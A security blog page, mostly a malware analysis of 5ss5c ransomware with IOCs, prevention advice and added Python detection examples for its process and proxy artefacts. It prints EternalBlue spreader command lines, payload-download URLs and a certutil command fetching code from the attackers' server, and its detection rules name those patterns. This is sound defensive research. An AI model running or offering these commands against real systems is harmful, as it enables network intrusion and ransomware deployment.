and targeted - there is really no need to feel bad if you have been affected, as it can happen to anyone. Explain to your crypto provider what happened, and they should be able to help you out.</p><p>I'd like to thank all the vigilant users on Twitter out there for creating awareness, and I hope this blog has provided further insight. If you were affected, and you'd like me to analyse any suspicious file, or would just like to comment, use the comment section below or contact me on <a href="https://twitter.com/bartblaze" target="_blank">Twitter</a>. 
Refer to my <a href="https://bartblaze.blogspot.com/p/about.html" target="_blank">About me</a> page for even more contact details.</p></div>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-35506160155529784782020-11-23T21:33:00.003+01:002023-03-01T13:22:26.034+01:00Blue Team Puzzle<p>Several years ago, I created a "malware puzzle" - basically, a crossword puzzle but with terms related to malware. You can find that puzzle here: <a href="https://bartblaze.blogspot.com/2013/08/malware-puzzle.html" target="_blank">https://bartblaze.blogspot.com/2013/08/malware-puzzle.html</a></p><p>Since crosswords are a hobby of mine, I thought it'd be fun to create another one more than seven years later - this time, all things blue team! Obviously you don't need to be part of a blue team to fill in the puzzle, it's for anyone in information or cyber security - but it does help if you've been on the defence side of things.</p><p>You can print the puzzle and fill it in, or you can use Adobe Reader to complete the PDF version, or use any tool to your liking (mspaint is also a candidate). There are no spaces - all words are one word.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PnE9TtleDF8/X7wWGEv9QQI/AAAAAAAACbo/BQUSLKDKm0YOUHFXvsIY_N46gNYgroPfwCLcBGAsYHQ/s1203/crossword-iiRh073oLn.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1203" data-original-width="681" height="320" src="https://1.bp.blogspot.com/-PnE9TtleDF8/X7wWGEv9QQI/AAAAAAAACbo/BQUSLKDKm0YOUHFXvsIY_N46gNYgroPfwCLcBGAsYHQ/s320/crossword-iiRh073oLn.png" /></a></div><div style="clear: both;"></div><p>You can find the puzzle in the following formats:</p><p>PNG: <a href="https://www.mediafire.com/view/0iuzvxal8redjz2/crossword-iiRh073oLn.png/file" target="_blank">https://www.mediafire.com/view/0iuzvxal8redjz2/crossword-iiRh073oLn.png/file</a></p><p>PNG mirror: <a href="https://imgur.com/a/ASATRXf" target="_blank">https://imgur.com/a/ASATRXf</a></p><p>PDF: <a href="https://www.mediafire.com/file/b3v7pebohp6c8vn/crossword-xp6dZUU9Ar.pdf/file" target="_blank">https://www.mediafire.com/file/b3v7pebohp6c8vn/crossword-xp6dZUU9Ar.pdf/file</a></p><p>PDF mirror: <a href="https://www.filedropper.com/crossword-xp6dzuu9ar" target="_blank">https://www.filedropper.com/crossword-xp6dzuu9ar</a></p><p>If you have the solution, feel free to leave a comment or @ me on Twitter: <a href="https://twitter.com/bartblaze" target="_blank">https://twitter.com/bartblaze</a>.</p><p>To make things more interesting, you can set up a competition between your fellow defenders to see who can complete it first!</p><p>If you're stuck, I can always send you a hint - see my About page for contact information, use Twitter, or leave a comment. Note there may be spoilers around. 
</p>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-91066897949494418412020-01-14T23:48:00.005+01:002020-01-21T22:02:36.302+01:00Satan ransomware rebrands as 5ss5c ransomware
The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps <a href="https://bartblaze.blogspot.com/2018/04/maktub-ransomware-possibly-rebranded-as.html" target="_blank">Iron ransomware</a>, has now come up with a new version or rebranding named "5ss5c".<br />
<br />
In a previous blog post, <a href="https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" target="_blank">Satan ransomware adds EternalBlue exploit</a>, I described how the group behind Satan ransomware kept actively developing its ransomware, adding new functionality (at the time: EternalBlue) and techniques with each iteration. After that, the group appeared to halt operations, at least on the ransomware front, for several months.<br />
<br />
However, as it turns out, the group has been working on new ransomware - <b>5ss5c </b>- since at least November 2019.<br />
<br />
The following tweet got my attention:<br />
<br />
<blockquote class="twitter-tweet">
<div dir="ltr" lang="en">
🧐Unknown <a href="https://twitter.com/hashtag/Ransomware?src=hash&ref_src=twsrc%5Etfw">#Ransomware</a> captured tonight from <a href="https://twitter.com/hashtag/China?src=hash&ref_src=twsrc%5Etfw">#China</a>, Encrypt only compressed files.<br />
Email:5ss5c@mail.ru<br />
ext:.5ss5c<br />
IP:61.186.243.2 58.221.158.90<a href="https://twitter.com/demonslay335?ref_src=twsrc%5Etfw">@demonslay335</a> <a href="https://twitter.com/Amigo_A_?ref_src=twsrc%5Etfw">@Amigo_A_</a> <a href="https://twitter.com/GrujaRS?ref_src=twsrc%5Etfw">@GrujaRS</a> <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a> <a href="https://twitter.com/Rmy_Reserve?ref_src=twsrc%5Etfw">@Rmy_Reserve</a> <a href="https://twitter.com/VK_Intel?ref_src=twsrc%5Etfw">@VK_Intel</a> <a href="https://t.co/dTdgnMfoLX">pic.twitter.com/dTdgnMfoLX</a></div>
— onion (@jishuzhain) <a href="https://twitter.com/jishuzhain/status/1216368394485800961?ref_src=twsrc%5Etfw">January 12, 2020</a></blockquote>
<br />
After some quick checks, this turns out to be a downloader for the 5ss5c ransomware, and it operates in a way that is strongly reminiscent of Satan ransomware:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-R8iszii_PsM/XhuVHj70D_I/AAAAAAAACSQ/M8n7CBNaJK0Veos1vwHaryu9j5BYNXKOACLcBGAsYHQ/s1600/iron0.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="357" data-original-width="760" height="187" src="https://1.bp.blogspot.com/-R8iszii_PsM/XhuVHj70D_I/AAAAAAAACSQ/M8n7CBNaJK0Veos1vwHaryu9j5BYNXKOACLcBGAsYHQ/s400/iron0.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - 5ss5c downloader</td></tr>
</tbody></table>
<div style="clear: both;"></div>
The downloader fetches its payloads with certutil and even logs whether each download succeeded:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-N8z368OK-II/XhuWMIXpdeI/AAAAAAAACSc/HgmxxJWb5m017agvWacwCki_180ukg45gCLcBGAsYHQ/s1600/iron4.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="116" data-original-width="430" height="107" src="https://1.bp.blogspot.com/-N8z368OK-II/XhuWMIXpdeI/AAAAAAAACSc/HgmxxJWb5m017agvWacwCki_180ukg45gCLcBGAsYHQ/s400/iron4.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - certutil logging</td></tr>
</tbody></table>
<div style="clear: both;"></div>
It will download and leverage:<br />
<br />
<ul>
<li>Spreader (EternalBlue and hardcoded credentials);</li>
<li>Mimikatz and what appears to be another password dumper/stealer;</li>
<li>The actual ransomware.</li>
</ul>
<div>
<br />
The following hashes are relevant to this new variant:<br />
<br />
<b>Name</b>: down.txt<br />
<b>URL</b>: http://58.221.158[.]90:88/car/down.txt<br />
<b>Purpose</b>: Downloader<br />
<b>MD5</b>: 680d9c8bb70e38d3727753430c655699<br />
<b>SHA1</b>: 5e72192360bbe436a3f4048717320409fb1a8009<br />
<b>SHA256</b>: ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f<br />
<b>Compilation timestamp</b>: 2020-01-11 19:04:24<br />
<b>VirusTotal report</b>:<br />
<a href="https://www.virustotal.com/gui/file/ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f/summary" target="_blank">ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f</a><br />
<br />
<b>down.txt</b> is, as mentioned, the downloader for the spreader module and for the actual ransomware:<br />
<br />
<b>Name</b>: c.dat<br />
<b>URL</b>: http://58.221.158[.]90:88/car/c.dat<br />
<b>Purpose</b>: spreader<br />
<b>MD5</b>: 01a9b1f9a9db526a54a64e39a605dd30<br />
<b>SHA1</b>: a436e3f5a9ee5e88671823b43fa77ed871c1475b<br />
<b>SHA256</b>: 9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc<br />
<b>Compilation timestamp</b>: 2020-01-11 19:19:54<br />
<b>VirusTotal report</b>:<br />
<a href="https://www.virustotal.com/gui/file/9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc/details" target="_blank">9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc</a><br />
<br />
<b>Name</b>: cpt.dat<br />
<b>URL</b>: http://58.221.158[.]90:88/car/cpt.dat<br />
<b>Purpose</b>: ransomware<br />
<b>MD5</b>: 853358339279b590fb1c40c3dc0cdb72<br />
<b>SHA1</b>: 84825801eac21a8d6eb060ddd8a0cd902dcead25<br />
<b>SHA256</b>: ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c<br />
<b>Compilation timestamp</b>: 2020-01-11 19:54:25<br />
<b>VirusTotal report</b>:<br />
<a href="https://www.virustotal.com/gui/file/ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c/details" target="_blank">ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c</a><br />
<b>Fun fact</b>: file version information contains "<b>TODO: 5SS5C Encoder</b>".<br />
<br />
The compilation timestamps are sequential and lie within the same hour, which makes sense: the downloader was developed (and compiled) first, then the spreader, and finally the ransomware itself.<br />
<br />
Note that the filename <b>cpt.exe</b> was already used by Satan ransomware.<br />
<br />
Further indicators, such as hashes, URLs, file paths and so on will be posted at the end of this blog post.<br />
<br />
<br /></div>
<div>
<span style="font-size: large;"><b>5ss5c - still in development - and with oddities</b></span></div>
<div>
<br /></div>
<div>
There are quite a few curiosities indicating that 5ss5c is still in active development and stems from Satan ransomware, for example:</div>
<div>
<br /></div>
<div>
<ul>
<li>Several logs are created, e.g. the file "<i>C:\Program Files\Common Files\System\Scanlog</i>" simply records whether SMB (IPC) is open/available;</li>
<li>Certutil logging (successful download or not);</li>
<li>There are several Satan ransomware artefacts;</li>
<li>Other tactics, techniques and procedures (TTPs) align with Satan (and DBGer), and slightly overlap with Iron:</li>
<ul>
<li>One of these is, for example, the use of multiple packers to protect their droppers and payloads. </li>
<li>This time however, they decided to use both MPRESS and Enigma, and even Enigma Virtual Box! (Note: Enigma Protector and Enigma Virtual Box are different products. The latter, commonly abbreviated EnigmaVB, is an application virtualisation tool: it bundles an executable together with the files and registry entries it needs into a single file and serves them from a virtual file system at run time, which hides the embedded payloads from casual inspection but is not a code protector like Enigma Protector.)</li>
</ul>
</ul>
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
There are other curiosities as well, one of them being what appear to be hardcoded credentials:</div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-8QkMhsYOnUg/XhubeA08-iI/AAAAAAAACSo/KJgfA_JcyzggNVN2pk05W-2TnYaImrFCACLcBGAsYHQ/s1600/db.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="407" data-original-width="422" height="308" src="https://1.bp.blogspot.com/-8QkMhsYOnUg/XhubeA08-iI/AAAAAAAACSo/KJgfA_JcyzggNVN2pk05W-2TnYaImrFCACLcBGAsYHQ/s320/db.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Hardcoded creds</td></tr>
</tbody></table>
<div style="clear: both;"></div>
<div>
These hardcoded credentials will be used in an attempt to log in to a Microsoft SQL Server instance and execute commands on the database host through the <b>xp_cmdshell</b> extended stored procedure (disabled by default, but a sysadmin login can re-enable it with sp_configure):</div>
<div>
<a href="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15">https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15</a></div>
<div>
<br /></div>
<div>
Curiously, the ransomware contains the following strings related to the SQL database:</div>
<div>
<div>
<ul>
<li>ecology.url</li>
<li>ecology.password</li>
<li>ecology.user</li>
</ul>
</div>
</div>
<div>
Searching a bit further, we can discover a company named Finereport (<a href="https://www.finereport.com/en/company">https://www.finereport.com/en/company</a>), which claims to be "<i>Top 1 in China’s BI market share in IDC "China BI Software Tracker, 2018</i>". You guessed it - it uses an SQL database.</div>
<div>
<br />
What else is new is, as mentioned before, the use of Enigma Virtual Box for packing an additional spreader module, aptly named <b>poc.exe</b>. This suggests they may be experimenting (<b>poc</b> is often an acronym for <b>p</b>roof <b>o</b>f <b>c</b>oncept).<br />
<br />
This file will be dropped to <b>C:\ProgramData\poc.exe</b> and will run the following command:<br />
<br />
<blockquote class="tr_bq">
<i>cd /D C:\ProgramData&star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload C:\ProgramData\down64.dll --TargetIp </i></blockquote>
Now compare this to Satan ransomware's command:<br />
<br />
<blockquote class="tr_bq">
<i>cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp </i></blockquote>
Something looks similar here... :-)<br />
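<p>Both command lines are distinctive enough to alert on from process-creation telemetry. The following Python is an added example, not code from this post: it runs two checks over constructed events (image plus command line, in a simple "image|command line" form that is not a real log format), one for the EternalBlue toolkit arguments that Satan and 5ss5c share (--TargetIp, --DllPayload, --OutConfig, --TargetPort, --Function RunDLL, together with the blue.exe/star.exe file names), and one for certutil being used as a downloader as described earlier. The post only shows certutil's log output, so the certutil -urlcache -split -f command line in the sample is an assumption about how the downloader invokes it, and the target IP in the sample events is made up.</p>

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (not real telemetry), each written as
# "<Image>|<CommandLine>". Events 1-2 reuse the blue.exe/star.exe arguments
# from the post; event 3 assumes the usual certutil download syntax.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cmd.exe|cmd /c cd /D C:\ProgramData&blue.exe --TargetIp 10.0.0.7",
    r"C:\ProgramData\star.exe|star.exe --OutConfig a --TargetPort 445 --Protocol SMB "
    r"--Architecture x64 --Function RunDLL --DllPayload C:\ProgramData\down64.dll --TargetIp 10.0.0.7",
    r"C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://58.221.158.90:88/car/c.dat C:\ProgramData\c.dat",
    r"C:\Windows\System32\certutil.exe|certutil -hashfile C:\Windows\notepad.exe SHA256",
    r"C:\Program Files\Git\bin\git.exe|git clone https://example.invalid/repo.git",
]

# Argument names of the leaked EternalBlue tooling as used by Satan and 5ss5c.
TOOLKIT_ARGS = re.compile(
    r"--(TargetIp|DllPayload|OutConfig|TargetPort|Function\s+RunDLL)\b", re.IGNORECASE)
# File names the campaign drops the tooling under.
TOOLKIT_NAMES = re.compile(r"\b(blue|star)\.exe\b", re.IGNORECASE)
# certutil's URL cache option together with a URL: certutil used as a downloader.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)


@dataclass
class Hit:
    rule: str
    image: str
    command_line: str


def classify(image: str, command_line: str):
    """Return the name of the rule that fires for one event, or None."""
    args = {re.sub(r"\s+", " ", m.group(1)).lower()
            for m in TOOLKIT_ARGS.finditer(command_line)}
    # A lone --TargetIp is only conclusive together with the dropped binary name;
    # two or more distinct toolkit arguments are conclusive on their own.
    if len(args) >= 2 or (args and TOOLKIT_NAMES.search(command_line)):
        return "eternalblue_toolkit_args"
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe == "certutil.exe" and CERTUTIL_DOWNLOAD.search(command_line):
        return "certutil_download"
    return None


def scan(events):
    """Run classify() over "<Image>|<CommandLine>" events and collect the hits."""
    hits = []
    for event in events:
        image, _, command_line = event.partition("|")
        rule = classify(image, command_line)
        if rule:
            hits.append(Hit(rule, image, command_line))
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"{h.rule:26} {h.image}")
```

<p>On the sample events the first two fire the toolkit rule (the cmd.exe chain only carries --TargetIp, so it is the blue.exe name that tips it over), the download fires the certutil rule, and the legitimate certutil -hashfile invocation stays quiet. Matching on the argument set rather than on file hashes is the point: the hashes change between Satan, DBGer and 5ss5c, the command line does not.</p>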
<br />
<br />
<b style="font-size: x-large;">5ss5c ransomware - how it operates</b><br />
<b style="font-size: x-large;"><br /></b></div>
<div>
Back to the actual ransomware. It will create the following mutexes:</div>
<div>
<ul>
<li><b>SSSS_Scan </b>(in previous iterations SSS_Scan has also been observed)</li>
<li><b>5ss5c_CRYPT</b></li>
</ul>
</div>
<div>
<br /></div>
<div>
Just like its predecessor, 5ss5c has an exclusion list: specific files, and the contents of the following folders, will not be encrypted:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-OeBoVBRGB2Y/Xh41IIQHJTI/AAAAAAAACS4/Tl9K9cmfHRQuDaiZI-LpguG0mNizQtCCQCLcBGAsYHQ/s1600/excl.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="674" data-original-width="798" height="270" src="https://1.bp.blogspot.com/-OeBoVBRGB2Y/Xh41IIQHJTI/AAAAAAAACS4/Tl9K9cmfHRQuDaiZI-LpguG0mNizQtCCQCLcBGAsYHQ/s320/excl.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Exclusion list</td></tr>
</tbody></table>
<br /></div>
<div style="clear: both;"></div>
For example, the following folders belonging to Qihoo 360 (a Chinese internet security company that also offers antivirus software) were already excluded in Satan and DBGer ransomware:<br />
<br />
<ul>
<li>360rec</li>
<li>360sec</li>
<li>360sand</li>
</ul>
<br />
<br />
While these are new in 5ss5c ransomware:<br />
<br />
<ul>
<li>360downloads</li>
<li>360safe</li>
</ul>
<br />
<br />
As in previous iterations, 5ss5c ransomware will stop database-related services and processes.<br />
<br />
It will however only encrypt files with the following extensions:<br />
<blockquote class="tr_bq">
<i>7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip</i></blockquote>
This extension list differs from previous iterations and consists mostly of documents, archives, database files and VMware-related extensions such as <i>vmdk</i>.<br />
<br />
The ransomware will then create the following URI structure to communicate with the C2 server (<i>61.186.243[.]2</i>):<br />
<br />
<ul>
<li>/api/data.php?code=</li>
<li>&file=</li>
<li>&size=</li>
<li>&status=</li>
<li>&keyhash=</li>
</ul>
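<p>A matching example for the proxy side, added here and not taken from the post: the check-in above is recognisable by its path and parameter names regardless of which IP it is sent to, so the detection below keys on those and only uses the 61.186.243[.]2 address to tag a hit as the known C2. The log line format and all parameter values are constructed; the path and the parameter names come from the post.</p>

```python
from urllib.parse import urlsplit, parse_qs

C2_HOST = "61.186.243.2"            # C2 named in the post
BEACON_PATH = "/api/data.php"       # path from the post
BEACON_PARAMS = {"code", "file", "size", "status", "keyhash"}   # names from the post

# Constructed proxy log lines, "<timestamp> <client> <method> <url>" (not a real
# log format); the parameter values are made up.
SAMPLE_PROXY_LOG = [
    "2020-01-12T21:03:11Z 10.0.0.7 GET http://61.186.243.2/api/data.php"
    "?code=A1B2C3&file=C%3A%5Cdata%5Creport.xlsx&size=48213&status=1&keyhash=9f2c8e",
    "2020-01-12T21:03:12Z 10.0.0.7 GET http://61.186.243.2/api/data.php"
    "?code=A1B2C3&file=C%3A%5Cdata%5Cbackup.bak&size=104857600&status=0&keyhash=9f2c8e",
    "2020-01-12T21:04:00Z 10.0.0.9 GET http://intranet.example/api/data.php?page=2",
    "2020-01-12T21:05:40Z 10.0.0.9 GET http://www.example/index.html",
    "malformed line",
]


def parse_beacon(url: str):
    """Return the decoded check-in fields if url has the 5ss5c beacon shape, else None.
    Matching is on path + parameter set, so a C2 re-hosted on another IP is still caught."""
    u = urlsplit(url)
    if u.path != BEACON_PATH:
        return None
    query = {k: v[0] for k, v in parse_qs(u.query, keep_blank_values=True).items()}
    if not BEACON_PARAMS.issubset(query):
        return None
    fields = {k: query[k] for k in sorted(BEACON_PARAMS)}   # percent-decoded values
    fields["host"] = u.hostname or ""
    fields["known_c2"] = fields["host"] == C2_HOST
    return fields


def scan_proxy_log(lines):
    """Apply parse_beacon() to each line; lines that do not split into four fields are skipped."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) != 4:
            continue
        ts, client, _method, url = parts
        beacon = parse_beacon(url)
        if beacon:
            beacon.update(ts=ts, client=client)
            hits.append(beacon)
    return hits


if __name__ == "__main__":
    for b in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(b["ts"], b["client"], "->", b["host"], "file=", b["file"],
              "status=", b["status"], "(known C2)" if b["known_c2"] else "")
```

<p>The intranet request to a same-named data.php is not flagged because it lacks the parameter set, which keeps the rule usable on a busy proxy. Once a hit is confirmed, the decoded parameters are worth keeping as evidence: they are the ransomware's own record of what it touched on that host.</p>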
<div>
It will also create a ransom note on the <b>C:\</b> drive as: <b>_如何解密我的文件_.txt</b>, which translates to <b>_How to decrypt my file_.txt</b>. Example content is as follows:</div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-T0B4txHlNHs/Xh4-raVFVtI/AAAAAAAACTE/R-YoW8QHFLsuD140AF9vD-_rOifULExUgCLcBGAsYHQ/s1600/note.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="862" data-original-width="1291" height="213" src="https://1.bp.blogspot.com/-T0B4txHlNHs/Xh4-raVFVtI/AAAAAAAACTE/R-YoW8QHFLsuD140AF9vD-_rOifULExUgCLcBGAsYHQ/s320/note.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - ransom note</td></tr>
</tbody></table>
<div style="clear: both;"></div>
<div>
The content reads:</div>
<div>
<br /></div>
<br />
<blockquote>
<i>部分文件已经被加密<br />如果你想找回加密文件,发送 (1) 个比特币到我的钱包<br />从加密开始48小时之内没有完成支付,解密的金额会发生翻倍.<br />如果有其他问题,可以通过邮件联系我<br /><br />您的解密凭证是 :<br /><snip><br />Email:[5ss5c@mail.ru]</snip></i></blockquote>
<div>
<br /></div>
<div>
Translated:</div>
<div>
<br /></div>
<div>
<blockquote>
<i>Some files have been encrypted<br />If you want to retrieve the encrypted files, send (1) Bitcoin to my wallet<br />If payment is not completed within 48 hours from the start of encryption, the decryption price will double.<br />If you have other questions, you can contact me by email<br />Your decryption credentials are:<br /><snip><br />Email: [5ss5c@mail.ru]</snip></i></blockquote>
<br />
Interestingly, the ransom note does not contain a Bitcoin address. Additionally, the note only contains instructions in Chinese, not in Korean or English as previous iterations did. Is 5ss5c ransomware more targeted, or is it just actively being tested by the group/developers behind it?<br />
<br />
Encrypted files will have the actor's email address prepended and a unique token plus the ransomware's name appended, for example:<br />
<i>test.txt</i> becomes <i>[5ss5c@mail.ru]test.txt.Y54GUHKIG1T2ZLN76II9F3BBQV7MK4UOGSQUND7U.5ss5c</i>.<br />
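<p>As an added example (not the author's code), the extension list and excluded folder names above, together with the file name format, are enough for a small triage helper: given a file listing from an affected host it recovers the original name and token of each encrypted file, and tells which of the remaining files were in scope for encryption, so that a missing file with a targeted extension stands out. It only knows the five 360* folder names quoted in the post, not the full exclusion list from Figure 4, and it assumes the token is upper-case alphanumeric as in the example. The listing it runs over is constructed.</p>

```python
import re
from pathlib import PureWindowsPath

# Extension list from the post (the only extensions 5ss5c encrypts).
TARGET_EXTENSIONS = {
    "7z", "bak", "cer", "csv", "db", "dbf", "dmp", "docx", "eps", "ldf", "mdb", "mdf",
    "myd", "myi", "ora", "pdf", "pem", "pfx", "ppt", "pptx", "psd", "rar", "rtf", "sql",
    "tar", "txt", "vdi", "vmdk", "vmx", "xls", "xlsx", "zip",
}
# Only the excluded folder names quoted in the post; the full list is in Figure 4.
EXCLUDED_DIRS = {"360rec", "360sec", "360sand", "360downloads", "360safe"}

# [<email>]<original name>.<token>.5ss5c  -- the token is assumed to be upper-case
# alphanumeric, as in the post's example.
ENCRYPTED_NAME = re.compile(
    r"^\[(?P<email>[^\]]+)\](?P<original>.+)\.(?P<token>[A-Z0-9]+)\.5ss5c$")


def would_be_targeted(path: str) -> bool:
    """True if the file has a targeted extension and no parent folder is excluded."""
    p = PureWindowsPath(path)
    if any(part.lower() in EXCLUDED_DIRS for part in p.parts[:-1]):
        return False
    return p.suffix.lower().lstrip(".") in TARGET_EXTENSIONS


def parse_encrypted_name(name: str):
    """Split an encrypted file name into email, original name and token, or None."""
    m = ENCRYPTED_NAME.match(name)
    return m.groupdict() if m else None


def triage(paths):
    """Sort a file listing into (encrypted, in_scope, out_of_scope).
    Encrypted entries are (encrypted path, recovered original path, token)."""
    encrypted, in_scope, out_of_scope = [], [], []
    for path in paths:
        p = PureWindowsPath(path)
        info = parse_encrypted_name(p.name)
        if info:
            encrypted.append((path, str(p.with_name(info["original"])), info["token"]))
        elif would_be_targeted(path):
            in_scope.append(path)
        else:
            out_of_scope.append(path)
    return encrypted, in_scope, out_of_scope


# Constructed file listing for the demo.
SAMPLE_LISTING = [
    r"C:\data\report.xlsx",
    r"C:\data\notes.doc",
    r"C:\Program Files\360safe\config.db",
    r"C:\data\[5ss5c@mail.ru]test.txt.Y54GUHKIG1T2ZLN76II9F3BBQV7MK4UOGSQUND7U.5ss5c",
    r"D:\vm\web01.vmdk",
    r"C:\Windows\System32\kernel32.dll",
]

if __name__ == "__main__":
    enc, scope, skipped = triage(SAMPLE_LISTING)
    for path, original, token in enc:
        print("encrypted:", path, "->", original, "token", token)
    print("would be encrypted:", scope)
    print("out of scope:", skipped)
```

<p>Note that notes.doc is out of scope: the list names docx, xls and xlsx but not doc, which is the kind of detail worth checking against Figure 4 before relying on the helper during an incident. The recovered original path is for inventory only; the content is still encrypted.</p>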
<br />
<br />
<div>
<b><span style="font-size: large;">Prevention</span></b></div>
<div>
<ul>
<li>Enable UAC;</li>
<li>Enable Windows Update, and install updates (especially verify if <a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010" target="_blank">MS17-010</a> is installed);</li>
<li>Install an antivirus, and keep it up-to-date and running;</li>
<li>Install a firewall, or enable the Windows Firewall;</li>
<li>Restrict, where possible, access to shares (ACLs);</li>
<li>Create backups! (and test them)</li>
</ul>
<div>
More ransomware prevention can be found <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here</a>.</div>
</div>
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<b><br /></b>
Satan is dead, long live 5ss5c! It just doesn't sound as good, does it?<br />
<br />
Whoever is behind the development of Satan, DBGer, Lucky and likely Iron ransomware is back in business with 5ss5c ransomware, which appears to be in active development - and the group seems to be trying to increase (or perhaps focus?) its targeting and the spread of the ransomware.<br />
<br />
It is recommended that organisations detect and/or search for the indicators of compromise (IOCs) below, and have proper prevention controls in place. MITRE ATT&CK IDs can also be found below.<br />
<div>
<br />
<b>Indicators of Compromise</b>:<br />
<br />
<style type="text/css">
table.tableizer-table {
font-size: 12px;
border: 1px solid #CCC;
font-family: Arial, Helvetica, sans-serif;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #CCC;
}
.tableizer-table th {
background-color: #104E8B;
color: #FFF;
font-weight: bold;
}
</style>
<br />
<table class="tableizer-table">
<thead>
<tr class="tableizer-firstrow"><th>Type </th><th>Indicator</th></tr>
</thead><tbody>
<tr><td>File </td><td>C:\Program Files\Common Files\System\Scanlog</td></tr>
<tr><td>File </td><td>C:\Program Files\Common Files\System\cpt.exe</td></tr>
<tr><td>File </td><td>C:\Program Files\Common Files\System\tmp</td></tr>
<tr><td>File </td><td>C:\ProgramData\5ss5c_token</td></tr>
<tr><td>File </td><td>C:\ProgramData\blue.exe</td></tr>
<tr><td>File </td><td>C:\ProgramData\blue.fb</td></tr>
<tr><td>File </td><td>C:\ProgramData\blue.xml</td></tr>
<tr><td>File </td><td>C:\ProgramData\down64.dll</td></tr>
<tr><td>File </td><td>C:\ProgramData\mmkt.exe</td></tr>
<tr><td>File </td><td>C:\ProgramData\poc.exe</td></tr>
<tr><td>File </td><td>C:\ProgramData\star.exe</td></tr>
<tr><td>File </td><td>C:\ProgramData\star.fb</td></tr>
<tr><td>File </td><td>C:\ProgramData\star.xml</td></tr>
<tr><td>Registry key </td><td>SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5ss5cStart</td></tr>
<tr><td>Command </td><td>C:\Windows\system32\cmd.exe /c cd /D C:\ProgramData&blue.exe --TargetIp</td></tr>
<tr><td>Command </td><td>star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload C:\ProgramData\down64.dll --TargetIp</td></tr>
<tr><td>Mutex </td><td>SSSS_Scan</td></tr>
